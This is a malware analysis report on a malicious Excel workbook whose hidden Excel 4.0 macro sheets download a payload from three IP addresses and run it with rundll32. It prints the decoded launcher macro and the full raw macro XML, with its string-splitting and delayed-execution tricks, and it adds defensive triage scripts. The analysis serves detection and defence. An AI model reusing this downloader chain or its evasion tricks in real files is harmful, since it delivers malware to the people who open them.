Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 caf107ae36eaee78…

MALICIOUS

Office (OOXML)

Size: 110.4 KB
Created: 2015-06-05 18:19:34 UTC (from the document's own core properties; this field is set by whatever authored or templated the file and is trivially forged, so it is not evidence of when the lure was built)
Authoring application: Microsoft Excel 16.0300
First seen: 2021-05-15
MD5: d1957c97341606a1fc76161bd37e6449
SHA-1: 572c1562fc9298556a7d8c350294b56256dcd3d3
SHA-256: caf107ae36eaee789eb91db916ee548fac8263bbd822cde1ae300adf87b971a9
Risk score: 158

Heuristics (6)

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: HALT, GOTO, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheets use formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA); these are the primitives used to download payloads, write files and start processes without invoking VBA. In this sample REGISTER binds a Win32 export (the name URLDownloadToFileA is assembled from three string fragments in the first macro sheet) to an Excel-callable alias, EXEC starts a process (a rundll32 command assembled from three cells in the third sheet), and GOTO/HALT move control between the three sheets.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project (xl/vbaProject.bin). The VBA is only a 796-byte launcher: its Auto_Open hands control to the XLM sheet through Application.Run, so a VBA-only scan sees nothing beyond the entry point.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script: Function Auto_Open()
  • Hidden worksheet low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s), matching the number of macro sheets. Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction. The macro sheet parts carry no sheet name; the names JUtgsgg, Blodas and Jioka are known only from the cross-sheet GOTO and REGISTER references in the formulas.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://185.45.193.74/44313,6048108796.dat (referenced by macro)
    • http://195.123.220.175/44313,6048108796.dat (referenced by macro)
    • http://45.144.29.253/44313,6048108796.dat (referenced by macro)
    • http://185.45.193.74/ (referenced by macro)
    • http://195.123.220.175/ (referenced by macro)
    • http://45.144.29.253/ (referenced by macro)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)
    Caveat on the three .dat URLs: the macro builds each one at run time with CONCATENATE over a host literal, NOW() and two shared strings, so the "44313,6048108796" path segment is the cached result of the last recalculation on the author's machine (Excel serial date 44313.6048, i.e. 2021-04-27 local time, written with a comma because the author's locale uses a comma decimal separator). A request made on a victim host will carry a different path, so block on the three hosts rather than on the full URL. The schemas.* entries are XML namespace URIs present in every OOXML file and are not network indicators.
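The heuristics above are all container-level facts that can be read straight out of the zip without opening the workbook. The following is an added example of those checks, not the report's own tooling: it flags Excel 4.0 macro sheet parts, the presence of a VBA project, hidden or veryHidden sheets, and every non-namespace URL attributed to the part that carries it. build_sample() constructs a minimal workbook in memory (assumed content: one visible sheet, one hidden macro sheet named JUtgsgg holding a host literal, and a stub vbaProject.bin) so the code runs offline; on a real file call triage_xlsx(open(path, "rb").read()).

```python
"""Container-level triage of an OOXML workbook: the checks behind the
OOXML_XLM_MACROSHEET, OOXML_VBA, OOXML_HIDDEN_SHEET and EMBEDDED_URL findings.
Added example, not the report's own code; the sample workbook is constructed."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_CT = "http://schemas.openxmlformats.org/package/2006/content-types"
# Content types Excel assigns to Excel 4.0 macro sheet parts.
MACROSHEET_CTS = {"application/vnd.ms-excel.macrosheet+xml",
                  "application/vnd.ms-excel.intlmacrosheet+xml"}
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")
# XML namespace/schema URIs occur in every OOXML part and are not network indicators.
SCHEMA_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org")


def triage_xlsx(blob):
    """Return a dict of findings for an OOXML workbook given as bytes."""
    findings = {"xlm_sheets": [], "vba_project": False, "hidden_sheets": [], "urls": {}}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()

        # 1. XLM macro sheets: declared in [Content_Types].xml and stored under
        #    xl/macrosheets/. Check both; either alone can be tampered with.
        ct = ET.fromstring(z.read("[Content_Types].xml"))
        for o in ct.iter(f"{{{NS_CT}}}Override"):
            if o.get("ContentType") in MACROSHEET_CTS:
                findings["xlm_sheets"].append(o.get("PartName"))
        for n in names:
            if n.startswith("xl/macrosheets/") and "/" + n not in findings["xlm_sheets"]:
                findings["xlm_sheets"].append("/" + n)

        # 2. VBA project: an OLE2 container. Presence is the finding here;
        #    decoding the source is olevba's job.
        findings["vba_project"] = "xl/vbaProject.bin" in names

        # 3. hidden and veryHidden sheets from workbook.xml. A veryHidden sheet
        #    cannot be unhidden from the Excel UI at all.
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        for s in wb.iter(f"{{{NS_MAIN}}}sheet"):
            state = s.get("state", "visible")
            if state != "visible":
                findings["hidden_sheets"].append((s.get("name"), state))

        # 4. URLs in every XML part, attributed to the part(s) that carry them,
        #    so a macro-sheet URL is distinguishable from a hyperlink relationship.
        for n in names:
            if not n.endswith(".xml"):
                continue
            for raw in URL_RE.findall(z.read(n)):
                url = raw.decode("utf-8", "replace")
                if any(h in url for h in SCHEMA_HOSTS):
                    continue
                findings["urls"].setdefault(url, set()).add(n)
    return findings


def build_sample():
    """Constructed sample (not the analysed file): one visible worksheet, one
    hidden XLM macro sheet holding a download-host literal, a stub vbaProject.bin."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Types xmlns="{NS_CT}">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        '<Override PartName="/xl/workbook.xml" '
        'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        '<Override PartName="/xl/worksheets/sheet1.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
        '<Override PartName="/xl/macrosheets/sheet1.xml" '
        'ContentType="application/vnd.ms-excel.macrosheet+xml"/>'
        '</Types>')
    workbook = (
        f'<workbook xmlns="{NS_MAIN}"><sheets>'
        '<sheet name="Sheet1" sheetId="1"/>'
        '<sheet name="JUtgsgg" sheetId="2" state="hidden"/>'
        '</sheets></workbook>')
    macrosheet = (
        f'<xm:macrosheet xmlns="{NS_MAIN}" '
        'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>'
        '<row r="101"><c r="AG101" t="str"><f>"http://185.45.193.74/"</f>'
        '<v>http://185.45.193.74/</v></c></row></sheetData></xm:macrosheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml",
                   f'<worksheet xmlns="{NS_MAIN}"><sheetData/></worksheet>')
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1")  # OLE2 magic only
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in triage_xlsx(build_sample()).items():
        print(f"{key}: {value}")
```

The URL scan deliberately reports the part name rather than a channel label: on this sample that is enough to separate the three download hosts (macro sheet parts) from the namespace noise, and it costs nothing on a clean file.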

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 796 bytes
SHA-256: 75218b3f0bb17eeec5572784caf45beb820d0c1786c79b4827590e90358f3168
Preview (first 1,000 lines of the extracted script):
' Document-module stubs for the workbook and its first sheet. The VB_Name values are
' the defaults of a Russian-language Excel (ЭтаКнига = ThisWorkbook, Лист1 = Sheet1);
' neither module contains code.
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' Auto_Open runs when macros are enabled on open. The VBA carries no payload of its
' own: it only starts the Excel 4.0 macro in the hidden sheet "JUtgsgg". Application.Run
' on a cell reference executes the XLM macro from that cell downwards, skipping empty
' cells, so the run from AJ6 reaches AJ94 (=ON.TIME(...)) and then AJ97 (=HALT()).
' Column A holds no cells in the extracted macro sheet (its range is AE92:AK113).
Function Auto_Open()
    Application.Run Sheets("JUtgsgg").Range("AJ6")
    Application.Run Sheets("JUtgsgg").Range("A5")
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 13824 bytes
SHA-256: f94c515c15a2369b46850e056a403c6ee0151dcf0eaaee0fd438d3a90bd5464f
xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 4291 bytes
SHA-256: 3b11ac276e03e0a75147eb42f7fa8acafe7bfdb28b0154bb5f4e04a17633ef7a
This is the sheet the other two reference as JUtgsgg (macro sheet parts carry no name; names live in workbook.xml, which is not among the extracted parts). Columns AE:AK are hidden (hidden="1"), and the sheet holds the data the download stage consumes. Cells with content, in column order:
  AG95, AG96, AG97  =CONCATENATE(AG101|AG102|AG103, AH95, AG99, AG100): the three download URLs (host literal + NOW() + two shared strings); cached values http://185.45.193.74/44313,6048108796.dat and the same path on the other two hosts
  AG99, AG100, AI99, AI101, AI102, AI105  shared-string references (t="s", indices 0..5); the sharedStrings part is not shown, so their text (the DLL name, type string, alias and download path used by REGISTER and the download call) is not visible here
  AG101, AG102, AG103  "http://185.45.193.74/", "http://195.123.220.175/", "http://45.144.29.253/"
  AG106, AG107, AG113  "URLDow", "nloadToF", "ileA"
  AH95   =NOW()  (cached 44313.604810879631, i.e. 2021-04-27 about 14:31 on the author's clock)
  AH98   =CONCATENATE(AG106,AG107,AG113) -> URLDownloadToFileA
  AH104  =GOTO(Blodas!G6)  (jump into the second macro sheet)
  AI92   1  (used as REGISTER's macro_type argument);  AI93  9  (unreferenced in the extracted sheets)
  AJ94   =ON.TIME(NOW()+"00:00:02","Grestes")  (schedules the macro named Grestes two seconds later; the name is not defined in any extracted part)
  AJ97   =HALT()
Auto_Open starts at AJ6, so all that runs synchronously is AJ94 then AJ97: the download chain is detached from the Auto_Open call by ON.TIME, which defeats emulation that stops when Auto_Open returns.
Raw XML (first 1,000 lines of the extracted part):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{DF8B6045-B836-40DC-A5AC-AC252F7F483B}"><dimension ref="AE92:AK113"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="29" width="13.5703125" style="1"/><col min="30" max="30" width="13.5703125" style="1" customWidth="1"/><col min="31" max="33" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="34" max="34" width="19.5703125" style="1" hidden="1" customWidth="1"/><col min="35" max="35" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="36" max="36" width="21.5703125" style="1" hidden="1" customWidth="1"/><col min="37" max="37" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="38" max="38" width="13.5703125" style="1"/><col min="39" max="39" width="21.42578125" style="1" bestFit="1" customWidth="1"/><col min="40" max="16384" width="13.5703125" style="1"/></cols><sheetData><row r="92" spans="33:36" x14ac:dyDescent="0.25"><c r="AI92" s="1"><v>1</v></c></row><row r="93" spans="33:36" x14ac:dyDescent="0.25"><c r="AI93" s="1"><v>9</v></c></row><row r="94" spans="33:36" x14ac:dyDescent="0.25"><c r="AJ94" s="1" t="b"><f>ON.TIME(NOW()+"00:00:02","Grestes")</f><v>0</v></c></row><row 
r="95" spans="33:36" x14ac:dyDescent="0.25"><c r="AG95" s="1" t="str"><f>CONCATENATE(AG101,AH95,AG99,AG100)</f><v>http://185.45.193.74/44313,6048108796.dat</v></c><c r="AH95" s="1"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="96" spans="33:36" x14ac:dyDescent="0.25"><c r="AG96" s="1" t="str"><f>CONCATENATE(AG102,AH95,AG99,AG100)</f><v>http://195.123.220.175/44313,6048108796.dat</v></c></row><row r="97" spans="33:36" x14ac:dyDescent="0.25"><c r="AG97" s="1" t="str"><f>CONCATENATE(AG103,AH95,AG99,AG100)</f><v>http://45.144.29.253/44313,6048108796.dat</v></c><c r="AJ97" s="1" t="b"><f>HALT()</f><v>0</v></c></row><row r="98" spans="33:36" x14ac:dyDescent="0.25"><c r="AH98" s="1" t="str"><f>CONCATENATE(AG106,AG107,AG113)</f><v>URLDownloadToFileA</v></c></row><row r="99" spans="33:36" x14ac:dyDescent="0.25"><c r="AG99" s="1" t="s"><v>0</v></c><c r="AI99" s="1" t="s"><v>1</v></c></row><row r="100" spans="33:36" x14ac:dyDescent="0.25"><c r="AG100" s="1" t="s"><v>2</v></c></row><row r="101" spans="33:36" x14ac:dyDescent="0.25"><c r="AG101" s="1" t="str"><f>"http://185.45.193.74/"</f><v>http://185.45.193.74/</v></c><c r="AI101" s="1" t="s"><v>3</v></c></row><row r="102" spans="33:36" x14ac:dyDescent="0.25"><c r="AG102" s="1" t="str"><f>"http://195.123.220.175/"</f><v>http://195.123.220.175/</v></c><c r="AI102" s="1" t="s"><v>4</v></c></row><row r="103" spans="33:36" x14ac:dyDescent="0.25"><c r="AG103" s="1" t="str"><f>"http://45.144.29.253/"</f><v>http://45.144.29.253/</v></c></row><row r="104" spans="33:36" x14ac:dyDescent="0.25"><c r="AH104" s="1" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c></row><row r="105" spans="33:36" x14ac:dyDescent="0.25"><c r="AI105" s="1" t="s"><v>5</v></c></row><row r="106" spans="33:36" x14ac:dyDescent="0.25"><c r="AG106" s="1" t="str"><f>"URLDow"</f><v>URLDow</v></c></row><row r="107" spans="33:36" x14ac:dyDescent="0.25"><c r="AG107" s="1" t="str"><f>"nloadToF"</f><v>nloadToF</v></c></row><row r="113" spans="33:33" 
x14ac:dyDescent="0.25"><c r="AG113" s="1" t="str"><f>"ileA"</f><v>ileA</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 2111 bytes
SHA-256: a5fc80b1569128bd0323daacf4b0484b147d9d37755aacc26435ea011bd9f0cd
Referenced as Blodas from sheet1 (GOTO(Blodas!G6)). Execution enters at G6 and walks down column G; every formula reads its operands from JUtgsgg:
  G11  =REGISTER(JUtgsgg!AI99, JUtgsgg!AH98, JUtgsgg!AI101, JUtgsgg!AI102, , JUtgsgg!AI92, 9)
       REGISTER(module_text, procedure, type_text, function_text, argument_text, macro_type, category): loads the DLL named in AI99, binds its export URLDownloadToFileA (AH98) under the Excel-callable name in AI102 with the argument/return type string from AI101. That name must be Belandes, since that is what the next cell calls.
  G12  =Belandes(0, JUtgsgg!AG95, JUtgsgg!AI105, 0, 0)
       i.e. URLDownloadToFileA(NULL, url, AI105, 0, NULL): download the first URL to the path held in AI105.
  G13  =IF(G12<0, Belandes(0, JUtgsgg!AG96, JUtgsgg!AI105, 0, 0))
  G14  =IF(G13<0, Belandes(0, JUtgsgg!AG97, JUtgsgg!AI105, 0, 0))
       Fallback across the three hosts: a failing URLDownloadToFileA returns an error HRESULT (high bit set), which reads as a negative number under a signed return type.
  G16  =IF(G14<0, CLOSE(0), )   close the workbook without saving if all three downloads failed
  G18  =GOTO(Jioka!H4)          hand over to the third sheet to run the payload
The cached #NAME? in G12:G14 and the 0 in G11 are the values at save time, when Belandes had not been registered; they say nothing about what happens on a victim host.
Raw XML (first 1,000 lines of the extracted part):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{505B4405-D1BA-4A49-969C-12F950A2EDD3}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="7.85546875" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="7.85546875" style="1"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="1" t="b"><f>REGISTER(JUtgsgg!AI99,JUtgsgg!AH98,JUtgsgg!AI101,JUtgsgg!AI102,,JUtgsgg!AI92,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="1" t="e"><f>Belandes(0,JUtgsgg!AG95,JUtgsgg!AI105,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="1" t="e"><f>IF(G12&lt;0, Belandes(0,JUtgsgg!AG96,JUtgsgg!AI105,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="1" t="e"><f>IF(G13&lt;0, Belandes(0,JUtgsgg!AG97,JUtgsgg!AI105,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="1" t="e"><f>GOTO(Jioka!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup 
paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 1944 bytes
SHA-256: a6c079d2a564b952bdc7f60d49402489a374e91f07f8b51ef328523d2a650900
Referenced as Jioka from sheet2 (GOTO(Jioka!H4)). Execution enters at H4 and walks down column H:
  I7, I9, I10  "rund", "ll32 ..\TYFYTY.GVTYGU,DllReg", "isterServer"  (the command is split across cells so that no single cell holds the string)
  H16  =EXEC(I7&I9&I10)=PI()  ->  EXEC("rundll32 ..\TYFYTY.GVTYGU,DllRegisterServer"); the comparison with PI() is noise that only changes the cell's cached value
  H20  =HALT()
The rundll32 target is a relative path without a .dll extension (rundll32 does not require one), consistent with the download destination passed to URLDownloadToFileA in the previous sheet: the downloaded file is loaded and its DllRegisterServer export called. Detection points are the three hosts on the wire and a rundll32 child of EXCEL.EXE with a non-.dll argument.
Raw XML (first 1,000 lines of the extracted part):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{E09DE6CC-F7FE-45A7-AA3D-E8E197BA8A24}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="1"/><col min="8" max="8" width="9.85546875" style="1" customWidth="1"/><col min="9" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="1" t="str"><f>"rund"</f><v>rund</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="1" t="str"><f>"ll32 ..\TYFYTY.GVTYGU,DllReg"</f><v>ll32 ..\TYFYTY.GVTYGU,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="1" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="1" t="b"><f>EXEC(I7&amp;I9&amp;I10)=PI()</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
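Reading the three macro sheets above by hand means sorting cells into execution order and gluing string fragments back together. The following added example, not the report's own tooling, does that for a macro sheet part: it lists formula cells in the order Excel walks them (down a column), flags the XLM primitives the OOXML_XLM_DANGEROUS_FN heuristic cares about, and resolves the string-building subset of XLM (quoted literals, references to string cells, the & operator, CONCATENATE) so an EXEC or CALL argument comes out as the real command. SAMPLE_XML is a constructed, trimmed copy of the third sheet (the rundll32 chain) with the namespace declarations that do not affect parsing dropped. Shared-string cells (t="s") and NOW()-derived values are deliberately left unresolved, since the stored values are an index and a stale timestamp respectively; resolving them needs sharedStrings.xml and a clock.

```python
"""Execution-order listing and string de-obfuscation for an OOXML Excel 4.0 macro
sheet part. Added example, not the report's own code; SAMPLE_XML is constructed."""
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# XLM functions that leave the workbook (process/file/Win32) or steer execution.
DANGEROUS = {"EXEC", "CALL", "REGISTER", "REGISTER.ID", "FOPEN", "FWRITE", "FORMULA",
             "FORMULA.FILL", "ON.TIME", "RUN", "GOTO", "HALT", "CLOSE"}
CELL_RE = re.compile(r"^([A-Z]{1,3})(\d+)$")

# Constructed sample modelled on xl/macrosheets/sheet3.xml above.
SAMPLE_XML = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<sheetData>
<row r="7"><c r="I7" t="str"><f>"rund"</f><v>rund</v></c></row>
<row r="9"><c r="I9" t="str"><f>"ll32 ..\TYFYTY.GVTYGU,DllReg"</f><v>ll32 ..\TYFYTY.GVTYGU,DllReg</v></c></row>
<row r="10"><c r="I10" t="str"><f>"isterServer"</f><v>isterServer</v></c></row>
<row r="16"><c r="H16" t="b"><f>EXEC(I7&amp;I9&amp;I10)=PI()</f><v>0</v></c></row>
<row r="20"><c r="H20" t="b"><f>HALT()</f><v>0</v></c></row>
</sheetData>
</xm:macrosheet>"""


def col_to_num(col):
    n = 0
    for ch in col:
        n = n * 26 + ord(ch) - 64
    return n


def cell_key(ref):
    """Column-major sort key: XLM executes downwards within a column."""
    m = CELL_RE.match(ref)
    return (col_to_num(m.group(1)), int(m.group(2)))


def parse_macrosheet(xml_text):
    """Map cell reference -> (formula or None, cached value or None, cell type)."""
    cells = {}
    for c in ET.fromstring(xml_text.encode("utf-8")).iter(NS + "c"):
        f, v = c.find(NS + "f"), c.find(NS + "v")
        cells[c.get("r")] = (f.text if f is not None else None,
                             v.text if v is not None else None, c.get("t"))
    return cells


def call_args(formula, fn):
    """Raw text between the parentheses of the first fn(...) call, honouring
    nested parentheses and quoted strings."""
    start = formula.find(fn + "(")
    if start < 0:
        return None
    begin = start + len(fn) + 1
    depth, in_str = 1, False
    for j in range(begin, len(formula)):
        ch = formula[j]
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch == "(":
            depth += 1
        elif not in_str and ch == ")":
            depth -= 1
            if depth == 0:
                return formula[begin:j]
    return None


def resolve_string(expr, cells, depth=0):
    """Evaluate the string-building subset of XLM; None for anything that is not
    provably a string (numbers, NOW(), shared-string indices). A quoted literal is
    returned whole, so the comma and & inside "ll32 ..\\TYFYTY.GVTYGU,DllReg" survive;
    a literal that itself contains an & next to other operands is not handled."""
    expr = expr.strip()
    if depth > 32:
        return None
    if len(expr) >= 2 and expr[0] == expr[-1] == '"' and expr.count('"') == 2:
        return expr[1:-1]
    if CELL_RE.match(expr):
        formula, value, typ = cells.get(expr, (None, None, None))
        if formula is not None:
            return resolve_string(formula, cells, depth + 1)
        return value if typ == "str" else None   # never trust t="s" indices
    inner = call_args(expr, "CONCATENATE")
    if inner is not None and expr.startswith("CONCATENATE("):
        parts = [resolve_string(p, cells, depth + 1) for p in inner.split(",")]
        return None if None in parts else "".join(parts)
    if "&" in expr:
        parts = [resolve_string(p, cells, depth + 1) for p in expr.split("&")]
        return None if None in parts else "".join(parts)
    return None


def triage(xml_text):
    """[(cell, sorted dangerous functions, resolved EXEC/CALL argument or None)]
    in execution order."""
    cells = parse_macrosheet(xml_text)
    out = []
    for ref in sorted(cells, key=cell_key):
        formula = cells[ref][0]
        if formula is None:
            continue
        hits = set(re.findall(r"([A-Z][A-Z0-9.]*)\s*\(", formula)) & DANGEROUS
        if not hits:
            continue
        resolved = None
        for fn in ("EXEC", "CALL"):
            if fn in hits:
                resolved = resolve_string(call_args(formula, fn), cells)
        out.append((ref, sorted(hits), resolved))
    return out


if __name__ == "__main__":
    for cell, fns, cmd in triage(SAMPLE_XML):
        print(cell, ",".join(fns), cmd or "")
```

Run against the first sheet, the same code resolves AH98 to URLDownloadToFileA but reports the URL cells as unresolved, which is the correct answer: their path segment depends on NOW() at run time and the cached value in the file is not what a victim host would request.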